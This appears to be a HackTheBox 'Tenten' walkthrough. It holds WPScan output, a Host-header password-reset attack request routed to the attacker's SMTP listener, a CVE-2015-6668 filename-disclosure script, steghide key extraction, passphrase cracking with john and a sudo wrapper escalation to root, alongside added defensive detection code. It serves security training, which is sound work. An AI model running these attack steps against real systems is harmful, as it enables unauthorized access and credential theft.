[i] Plugin(s) Identified:
[+] job-manager
 | Location: http://10.10.10.10/wp-content/plugins/job-manager/
 | Latest Version: 0.7.25 (up to date)
 | Last Updated: 2015-08-25T22:44:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Job Manager <= 0.7.25 - Insecure Direct Object Reference
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8167
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6668
 |      - https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/
 |
 | Version: 7.2.5 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.10/wp-content/plugins/job-manager/readme.txt
[+] Enumerating Vulnerable Themes (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:03 <=========> (325 / 325) 100.00% Time: 00:00:03
[+] Checking Theme Versions (via Aggressive Methods)
[i] Theme(s) Identified:
[+] twentyfifteen
 | Location: http://10.10.10.10/wp-content/themes/twentyfifteen/
 | Latest Version: 2.5
 | Last Updated: 2020-02-25T00:00:00.000Z
 | Readme: http://10.10.10.10/wp-content/themes/twentyfifteen/readme.txt
 | Style URL: http://10.10.10.10/wp-content/themes/twentyfifteen/style.css
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer.
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 | License: GNU General Public License v2 or later
 | License URI: http://www.gnu.org/licenses/gpl-2.0.html
 | Tags: blog, two-columns, left-sidebar, accessibility-ready, custom-background, custom-colors, custom-header, custom-logo, custom-menu, editor-style, featured-images, microformats, post-formats, rtl-language-support, sticky-post, threaded-comments, translation-ready
 | Text Domain: twentyfifteen
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.10/wp-content/themes/twentyfifteen/, status: 500
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Twenty Fifteen Theme <= 1.1 - DOM Cross-Site Scripting (XSS)
 |     Fixed in: 1.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7965
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3429
 |      - https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html
 |      - https://packetstormsecurity.com/files/131802/
 |      - https://seclists.org/fulldisclosure/2015/May/41
 |
 | The version could not be determined.
[+] Enumerating Config Backups (via Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <=======> (36 / 36) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:01 <=========> (100 / 100) 100.00% Time: 00:00:01
[i] No Medias Found.
[+] Enumerating Users (via Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] takis
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
[+] WPVulnDB API OK | Plan: free | Requests Done (during the scan): 3 | Requests Remaining: 47
[+] Finished: Tue Mar 10 16:23:34 2020
[+] Requests Done: 540
[+] Cached Requests: 7
[+] Data Sent: 122.725 KB
[+] Data Received: 483.67 KB
[+] Memory used: 205.129 MB
[+] Elapsed time: 00:00:11
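Two things in this output matter for the rest of the box: the core version 4.7.3 with its unpatched Host Header Injection in Password Reset (CVE-2017-8295), and the single user takis, which WPScan found via the wp-json users endpoint and then confirmed twice more, through the /?author=N redirect pattern and through the wording of wp-login.php's error message. The following is an added example, not part of the original write-up and not WPScan's code, that applies each of those three checks to constructed responses so the logic behind "Found By / Confirmed By" is visible; the WordPress 4.x error strings it matches are quoted from memory and should be treated as assumptions.

```python
"""Stand-alone versions of the three checks WPScan used to confirm 'takis'.

Added example, not from the original write-up or from WPScan. The HTTP
bodies and the redirect Location are constructed here; the login error
strings are WordPress 4.x wording quoted from memory (treat as assumptions).
"""
import json
import re
from html import unescape

# 1. REST API: GET /wp-json/wp/v2/users/ lists users who have published posts.
SAMPLE_WP_JSON = json.dumps([
    {"id": 1, "name": "takis", "slug": "takis",
     "link": "http://10.10.10.10/index.php/author/takis/"},
])

# 2. Author-ID brute force: GET /?author=1 answers 301 to the author archive,
#    and the archive path carries the user's nicename (the login by default).
SAMPLE_LOCATION = "http://10.10.10.10/index.php/author/takis/"

# 3. Login error messages: wp-login.php words the failure differently for a
#    non-existent user and for an existing user with a wrong password.
SAMPLE_LOGIN_ERRORS = {
    "nobody": '<div id="login_error"><strong>ERROR</strong>: Invalid username. '
              '<a href="/wp-login.php?action=lostpassword">Lost your password?</a><br />\n</div>',
    "takis": '<div id="login_error"><strong>ERROR</strong>: The password you entered for the '
             'username <strong>takis</strong> is incorrect. '
             '<a href="/wp-login.php?action=lostpassword">Lost your password?</a><br />\n</div>',
}


def users_from_wp_json(body):
    """User slugs from a /wp/v2/users response; [] when blocked or malformed."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    if not isinstance(data, list):      # e.g. {"code": "rest_user_cannot_view", ...}
        return []
    return sorted({u["slug"] for u in data if isinstance(u, dict) and u.get("slug")})


_AUTHOR_PATH = re.compile(r"/author/(?P<slug>[^/?#]+)/?")


def author_from_redirect(location):
    """Slug from the Location header of a /?author=N redirect, or None."""
    m = _AUTHOR_PATH.search(location or "")
    return m.group("slug") if m else None


_LOGIN_ERROR = re.compile(r'<div id="login_error">(?P<msg>.*?)</div>', re.S)
_TAGS = re.compile(r"<[^>]+>")
_WRONG_PASSWORD = re.compile(r"username (\S+) is incorrect")


def login_error_reveals_user(html):
    """(exists, username) from a wp-login.php error page; (None, None) if no error."""
    m = _LOGIN_ERROR.search(html)
    if not m:
        return None, None
    msg = unescape(_TAGS.sub("", m.group("msg")))
    if "Invalid username" in msg:
        return False, None
    pw = _WRONG_PASSWORD.search(msg)
    if pw:
        return True, pw.group(1)
    return None, None


def confirmed_users(wp_json_body, redirect_locations, login_pages):
    """{username: set(sources)}: the same 'Found By / Confirmed By' idea as WPScan."""
    evidence = {}
    for slug in users_from_wp_json(wp_json_body):
        evidence.setdefault(slug, set()).add("wp-json")
    for loc in redirect_locations:
        slug = author_from_redirect(loc)
        if slug:
            evidence.setdefault(slug, set()).add("author-id")
    for page in login_pages:
        exists, user = login_error_reveals_user(page)
        if exists:
            evidence.setdefault(user, set()).add("login-error")
    return evidence


if __name__ == "__main__":
    print(confirmed_users(SAMPLE_WP_JSON, [SAMPLE_LOCATION], SAMPLE_LOGIN_ERRORS.values()))
```

The login-error check is the one that keeps working when the REST endpoint is blocked and permalinks hide the author archive, which is why WPScan lists it as a confirmation method; from the defender's side it is also the one that is fixed by making both failure messages identical.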

Searchsploit

u505@kali:~/HTB/Machines/Tenten$ searchsploit WordPress 4.7
----------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                     |  Path
                                                                                   | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------- ----------------------------------------
WordPress 4.7.0/4.7.1 - Content Injection (Python)                                 | exploits/linux/webapps/41223.py
WordPress 4.7.0/4.7.1 - Content Injection (Ruby)                                   | exploits/linux/webapps/41224.rb
WordPress < 4.7.1 - Username Enumeration                                           | exploits/php/webapps/41497.php
WordPress < 4.7.4 - Unauthorized Password Reset                                    | exploits/linux/webapps/41963.txt
WordPress Plugin Cforms 14.7 - Remote Code Execution                               | exploits/php/webapps/35879.txt
WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure    | exploits/php/webapps/43872.html
WordPress Plugin ProPlayer 4.7.7 - SQL Injection                                   | exploits/php/webapps/17616.txt
WordPress Plugin ProPlayer 4.7.9.1 - SQL Injection                                 | exploits/php/webapps/25605.txt
WordPress Plugin Quiz And Survey Master 4.5.4/4.7.8 - Cross-Site Request Forgery   | exploits/php/webapps/40934.html
WordPress Plugin RB Agency 2.4.7 - Local File Disclosure                           | exploits/php/webapps/40333.txt
WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities                     | exploits/php/webapps/38869.txt
----------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

CVE-2017-8295

With this vulnerability, the password reset email should be delivered to our own SMTP server.

u505@kali:~/HTB/Machines/Tenten$ sudo python -m smtpd -c DebuggingServer -n 10.10.14.21:25
[sudo] password for u505:

Once the SMTP listener is started, we craft the HTTP request by hand, with our host in the Host header.

u505@kali:~/HTB/Machines/Tenten$ nc 10.10.10.10 80
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: 10.10.14.21
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=takis&redirect_to=&wp-submit=Get+New+Password

HTTP/1.1 500 Internal Server Error
Date: Sun, 15 Mar 2020 03:29:36 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Content-Length: 3493
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
...
<title>WordPress › Error</title>
...
<body id="error-page">
<p>The email could not be sent.<br />
Possible reason: your host may have disabled the mail() function.</p></body>
</html>

But it fails: the server answers 500 and reports that the email could not be sent, most likely because the mail() function is disabled on the host.

CVE-2015-6668

This disclosure exploits a vulnerability in the Job-Manager plugin. The main portal has a job listing link, so it looks like a good lead to work on.

Tenten02.png

The Jobs Listing link lets us apply for a position.

Tenten03.png

The link is http://10.10.10.10/index.php/jobs/apply/8/, and we upload an image as our CV.

Tenten04.png

Following the exploit, we can enumerate the WordPress posts by browsing the URL http://10.10.10.10/index.php/jobs/apply/<WP_ID>/, which gives us each post's title.

u505@kali:~/HTB/Machines/Tenten$ for i in `seq 1 20`; do echo -n "$i - "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>'; done
1 - <title>Job Application: Hello world! – Job Portal</title>
2 - <title>Job Application: Sample Page – Job Portal</title>
3 - <title>Job Application: Auto Draft – Job Portal</title>
4 - <title>Job Application – Job Portal</title>
5 - <title>Job Application: Jobs Listing – Job Portal</title>
6 - <title>Job Application: Job Application – Job Portal</title>
7 - <title>Job Application: Register – Job Portal</title>
8 - <title>Job Application: Pen Tester – Job Portal</title>
9 - <title>Job Application:  – Job Portal</title>
10 - <title>Job Application: Application – Job Portal</title>
11 - <title>Job Application: cube – Job Portal</title>
12 - <title>Job Application: Application – Job Portal</title>
13 - <title>Job Application: HackerAccessGranted – Job Portal</title>
14 - <title>Job Application: Application – Job Portal</title>
15 - <title>Job Application: u505 – Job Portal</title>
16 - <title>Job Application – Job Portal</title>
17 - <title>Job Application – Job Portal</title>
18 - <title>Job Application – Job Portal</title>
19 - <title>Job Application – Job Portal</title>
20 - <title>Job Application – Job Portal</title>

On number 15 we recognize our uploaded file, which seems to be the last document in the WordPress database.

u505@kali:~/HTB/Machines/Tenten$ cat filename.py
import requests

print """
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
"""
website = raw_input('Enter a vulnerable website: ')
filename = raw_input('Enter a file name: ')

# WordPress replaces spaces in uploaded file names with dashes
filename2 = filename.replace(" ", "-")
# CVs are stored under wp-content/uploads/<year>/<month>/, so try every
# year/month/extension combination and report the ones that exist
for year in range(2017,2021):
    for i in range(1,13):
        for extension in {'doc','pdf','docx','png','jpg','jpeg'}:
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            req = requests.get(URL)
            if req.status_code==200:
                print "[+] URL of CV found! " + URL

We reuse the Python script from the exploit, updating the year range and adding picture extensions.

u505@kali:~/HTB/Machines/Tenten$ python filename.py

CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25

Enter a vulnerable website: http://10.10.10.10
Enter a file name: u505
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2020/03/u505.png

It finds our image.

Tenten05.png

Now we run it for the filename HackerAccessGranted.

u505@kali:~/HTB/Machines/Tenten$ python filename.py

CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25

Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg

We find the URL.

Tenten06.png

And we download the picture.

u505@kali:~/HTB/Machines/Tenten$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
--2020-03-14 22:08:15--  http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
Connecting to 10.10.10.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 262408 (256K) [image/jpeg]
Saving to: ‘HackerAccessGranted.jpg’

HackerAccessGranted 100%[===================>] 256.26K 172KB/s in 1.5s
2020-03-14 22:08:16 (172 KB/s) - ‘HackerAccessGranted.jpg’ saved [262408/262408]
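Added example, not part of the original write-up: detection logic a defender could run over the web server's access log to spot the year/month/extension probing that the CVE-2015-6668 script above produces (many 404s under /wp-content/uploads/YYYY/MM/ for the same file basename from one client). The log lines, client addresses and thresholds are constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-log lines in the shape the enumeration script
# leaves behind (addresses, times and sizes are made up for this example).
SAMPLE_LOG = """\
10.10.14.21 - - [14/Mar/2020:22:02:10 -0400] "GET /wp-content/uploads/2017/01/HackerAccessGranted.pdf HTTP/1.1" 404 290 "-" "python-requests/2.22.0"
10.10.14.21 - - [14/Mar/2020:22:02:10 -0400] "GET /wp-content/uploads/2017/02/HackerAccessGranted.pdf HTTP/1.1" 404 290 "-" "python-requests/2.22.0"
10.10.14.21 - - [14/Mar/2020:22:02:11 -0400] "GET /wp-content/uploads/2017/03/HackerAccessGranted.jpg HTTP/1.1" 404 290 "-" "python-requests/2.22.0"
10.10.14.21 - - [14/Mar/2020:22:02:11 -0400] "GET /wp-content/uploads/2017/04/HackerAccessGranted.jpg HTTP/1.1" 200 262408 "-" "python-requests/2.22.0"
10.10.14.5 - - [14/Mar/2020:22:03:00 -0400] "GET /wp-content/uploads/2017/04/HackerAccessGranted.jpg HTTP/1.1" 200 262408 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
UPLOAD_RE = re.compile(r"^/wp-content/uploads/(\d{4})/(\d{2})/([^/]+)$")


def find_upload_enumeration(log_text, min_misses=3, window=timedelta(minutes=5)):
    """Flag clients probing many dated upload paths for the same basename.

    Returns {client: {basename: total_misses}} for every (client, basename)
    pair with at least `min_misses` 404 responses inside `window`; a single
    legitimate visitor fetching one CV never produces that pattern.
    """
    misses = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, _method, path, status = m.groups()
        u = UPLOAD_RE.match(path)
        if u and status == "404":
            base = u.group(3).rsplit(".", 1)[0]  # strip the probed extension
            misses[(client, base)].append(
                datetime.strptime(ts.split()[0], "%d/%b/%Y:%H:%M:%S"))
    hits = defaultdict(dict)
    for (client, base), times in misses.items():
        times.sort()
        for i, t in enumerate(times):
            # count misses inside the window that starts at this miss
            if sum(1 for t2 in times[i:] if t2 - t <= window) >= min_misses:
                hits[client][base] = len(times)
                break
    return {c: dict(b) for c, b in hits.items()}
```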

Steganography

The strings command finds nothing useful.

u505@kali:~/HTB/Machines/Tenten$ strings HackerAccessGranted.jpg

But steghide extracts a file without any passphrase.

u505@kali:~/HTB/Machines/Tenten$ steghide --extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".

The extracted file is an encrypted ssh private key.

u505@kali:~/HTB/Machines/Tenten$ file id_rsa
id_rsa: PEM RSA private key
u505@kali:~/HTB/Machines/Tenten$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C

Passphrase crack

We extract the hash of the private key.

u505@kali:~/HTB/Machines/Tenten$ /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

And we brute force it with john.

u505@kali:~/HTB/Machines/Tenten$ john -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword    (id_rsa)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2020-03-14 22:24) 0.4016g/s 5759Kp/s 5759Kc/s 5759KC/s *7¡Vamos!
Session completed
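Added example, not part of the original write-up: a small Python checker that reports what protects a private key file, distinguishing the legacy PEM format found here (john's output above shows the MD5 KDF with an iteration count of 1, which is why rockyou.txt went through at millions of candidates per second) from the OpenSSH key format, whose header carries a bcrypt round count. The Proc-Type and DEK-Info lines copy the ones shown on this page; the base64 body and the OpenSSH sample are constructed.

```python
import base64
import re
import struct

# Constructed sample: header lines as on this page, base64 body is filler.
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=
-----END RSA PRIVATE KEY-----
"""

def _ssh_string(data):
    """Encode bytes as an SSH wire 'string' (uint32 length + bytes)."""
    return struct.pack(">I", len(data)) + data

def _read_string(buf, off):
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def build_openssh_header(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16):
    """Construct the leading fields of an openssh-key-v1 blob (sample only)."""
    kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)  # salt, rounds
    blob = (b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(kdfopts))
    body = base64.b64encode(blob).decode()
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n" % body

def classify_key(pem):
    """Return the cipher, KDF and iteration count protecting a private key."""
    if "BEGIN OPENSSH PRIVATE KEY" in pem:
        body = "".join(l for l in pem.splitlines() if not l.startswith("-----"))
        raw = base64.b64decode(body)
        off = len(b"openssh-key-v1\x00")
        cipher, off = _read_string(raw, off)
        kdf, off = _read_string(raw, off)
        kdfopts, off = _read_string(raw, off)
        rounds = 0
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh-key-v1", "cipher": cipher.decode(),
                "kdf": kdf.decode(), "rounds": rounds, "encrypted": cipher != b"none"}
    m = re.search(r"^DEK-Info:\s*([A-Z0-9-]+),([0-9A-Fa-f]+)", pem, re.M)
    if "Proc-Type: 4,ENCRYPTED" in pem and m:
        # Legacy PEM: key = EVP_BytesToKey(MD5, salt=IV[:8], 1 iteration), cheap to guess
        return {"format": "pem", "cipher": m.group(1), "kdf": "md5-evp-bytestokey",
                "rounds": 1, "encrypted": True}
    return {"format": "pem", "cipher": "none", "kdf": "none", "rounds": 0, "encrypted": False}
```

Keys that come back as legacy PEM with one MD5 iteration should be regenerated with `ssh-keygen -o` (bcrypt KDF) or, better, not left embedded in web-served files at all.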

User Flag

The private key matches the user takis.

u505@kali:~/HTB/Machines/Tenten$ ssh -i id_rsa takis@10.10.10.10
The authenticity of host '10.10.10.10 (10.10.10.10)' can't be established.
ECDSA key fingerprint is SHA256:AxKIYOMkqGk3v+ZKgHEM6QcEDw8c8/qi1l0CMNSx8uQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.10' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

65 packages can be updated.
39 updates are security updates.

Last login: Fri May 5 23:05:36 2017
takis@tenten:~$ cat user.txt
<USER_FLAG>

Elevation of privileges

The marker file .sudo_as_admin_successful tells us that the user takis has sudo privileges.

takis@tenten:~$ ls -la
total 48
drwx------ 5 takis takis 4096 Apr 12  2017 .
drwxr-xr-x 5 root  root  4096 Apr 12  2017 ..
-rw------- 1 root  root     1 Dec 24  2017 .bash_history
-rw-r--r-- 1 takis takis  220 Apr 12  2017 .bash_logout
-rw-r--r-- 1 takis takis 3771 Apr 12  2017 .bashrc
drwx------ 2 takis takis 4096 Apr 12  2017 .cache
-rw------- 1 root  root   162 Apr 12  2017 .mysql_history
drwxrwxr-x 2 takis takis 4096 Apr 12  2017 .nano
-rw-r--r-- 1 takis takis  655 Apr 12  2017 .profile
drwx------ 2 takis takis 4096 Apr 12  2017 .ssh
-rw-r--r-- 1 takis takis    0 Apr 12  2017 .sudo_as_admin_successful
-r--r--r-- 1 takis takis   33 Apr 12  2017 user.txt
-rw-r--r-- 1 root  root   217 Apr 12  2017 .wget-hsts
takis@tenten:~$ sudo -l
Matching Defaults entries for takis on tenten:
   env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin

Takis can run /bin/fuckin as root without a password.

takis@tenten:~$ ls -l /bin/fuckin
-rwxr-xr-x 1 root root 24 Apr 12  2017 /bin/fuckin
takis@tenten:~$ file /bin/fuckin
/bin/fuckin: Bourne-Again shell script, ASCII text executable

The file is a Bash script that executes whatever parameters are passed to it.

takis@tenten:~$ cat /bin/fuckin
#!/bin/bash
$1 $2 $3 $4

So we can run it with bash as the parameter and get a root shell.

takis@tenten:~$ sudo /bin/fuckin bash
root@tenten:~# whoami
root

Root Flag

root@tenten:~# cd /root/
root@tenten:/root# cat root.txt
<ROOT_FLAG>

References

Daniel Simao 22:44, 14 March 2020 (EDT)